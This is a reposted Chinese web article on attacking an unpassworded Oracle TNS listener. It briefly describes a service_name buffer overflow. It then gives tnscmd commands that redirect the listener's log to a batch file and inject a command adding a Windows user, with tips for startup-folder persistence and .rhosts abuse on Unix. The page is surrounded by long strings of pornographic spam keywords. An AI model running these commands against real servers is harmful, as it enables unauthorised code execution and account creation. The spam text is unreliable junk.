精品免费在线观看-精品欧美-精品欧美成人bd高清在线观看-精品欧美高清不卡在线-精品欧美日韩一区二区

17站長網(wǎng)

17站長網(wǎng) 首頁 安全 安全教程 查看內(nèi)容

針對Oracle的TNS listener的攻擊方法

2022-9-24 10:21| 查看: 2322 |來源: 互聯(lián)網(wǎng)

首先,根據(jù)版本的不同,TNS listener可能較易受到多種類型的緩沖區(qū)溢出攻擊,這些攻擊可以在不提供用戶ID和口令的情況下被利用。例如:在oracle 9i中,當(dāng)客戶機(jī) ...

首先,根據(jù)版本的不同,TNS listener可能較易受到多種類型的緩沖區(qū)溢出攻擊,這些攻擊可以在不提供用戶ID和口令的情況下被利用。例如:在oracle 9i中,當(dāng)客戶機(jī)請求某個過長的service_name時,很容易受到溢出攻擊。當(dāng)listener為日志構(gòu)建錯誤消息之后,service_name的值會被復(fù)制到某于棧結(jié)構(gòu)的緩沖區(qū)內(nèi),從而引起溢出—覆蓋保存值將返回棧中的地址。這種做法可以使攻擊者獲得控制權(quán)。事實(shí)上,TNS listener曾經(jīng)有過多次溢出和格式化字符串的漏洞。

其次,另一類攻擊和日志文件有關(guān)。只有當(dāng)未給listener設(shè)置口令的時候,攻擊才會有效。假設(shè)某個listener沒有設(shè)置口令,攻擊方法如下:

tnscmd -h www.example.com -p 1521 –rawcmd “(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_directory)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=c:\\)))”  將日志目錄設(shè)置到C盤

tnscmd -h www.example.com -p 1521 –rawcmd “(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=test.bat)))”  將日志文件設(shè)置為test.bat

tnscmd -h www.example.com –rawcmd “(CONNECT_DATA=((     ||dir >test.txt||net user test test /add))”  該命令把dir >test.txt、net user test test /add命令寫入c:\test.bat文件,由于雙豎線的作用(第一條命令執(zhí)行失敗后,WINDOWS命令解釋器執(zhí)行后面的命令)把錯誤的信息注釋掉, 從而可以執(zhí)行我們提交的命令。

通過設(shè)置日志文件到不同的目錄,例如WINDOWS的啟動目錄,當(dāng)服務(wù)器重啟將執(zhí)行惡意用戶提交的特定代碼,從而對系統(tǒng)造成威脅。

運(yùn)行于UNIX系統(tǒng)上的oracle也會受到同樣的威脅。其中一種方法就是將“  ”回送給.rhost文件,當(dāng)系統(tǒng)運(yùn)行時,使用r*services命令。

tag標(biāo)簽:Oracle 攻擊方法
本文最后更新于 2022-9-24 10:21,某些文章具有時效性,若有錯誤或已失效,請在網(wǎng)站留言或聯(lián)系站長:[email protected]
·END·
站長網(wǎng)微信號:w17tui,關(guān)注站長、創(chuàng)業(yè)、關(guān)注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營銷服務(wù)中心

免責(zé)聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識,文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請勿用于商業(yè)用途,如果損害了您的權(quán)利,請聯(lián)系我們及時修正或刪除。謝謝!

17站長網(wǎng)微信二維碼

始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長轉(zhuǎn)型升級,為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務(wù),與站長一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)!

掃一掃,關(guān)注站長網(wǎng)微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 国内精品91| 亚洲第一综合色 | 亚洲精品久久久久久久网站 | 亚洲欧美久久精品 | 91热久久免费精品99 | 香蕉视频在线观 | 欧美男女爱爱视频 | 黄网站色年片在线观看 | 黄在线观看免费 | 欧美综合色区 | 国产人成精品香港三级在 | 一本一道波多野结衣一区二区 | 91社区在线观看 | 天天操夜夜逼 | 亚色在线 | 韩国免费播放一级毛片 | 亚洲精品第一综合99久久 | 美国一级毛片完整高清 | 久久99网站| 欧美成a人片在线观看久 | 美国a级作爱片免费观看美国 | 国产精品爽黄69天堂a | 欧美在线免费观看视频 | 国产精品jizz观看 | 在线看欧美日韩中文字幕 | 另类欧美日韩 | 男人看片网站 | 美女视频大全视频a免费九 美女视频大全美女视频黄 美女视频毛片 | 女人一级毛片免费观看 | 午夜三级毛片 | 久久精品中文字幕首页 | 天天干影视 | 国产在线观看人成激情视频 | 亚洲欧洲日韩另类自拍 | 日韩久久中文字幕 | 国产青草视频免费观看97 | 久久国产精品无码网站 | 免费免费啪视频在线 | 国产香蕉在线精彩视频 | 午夜人成| 中文字幕久久久久久久系列 |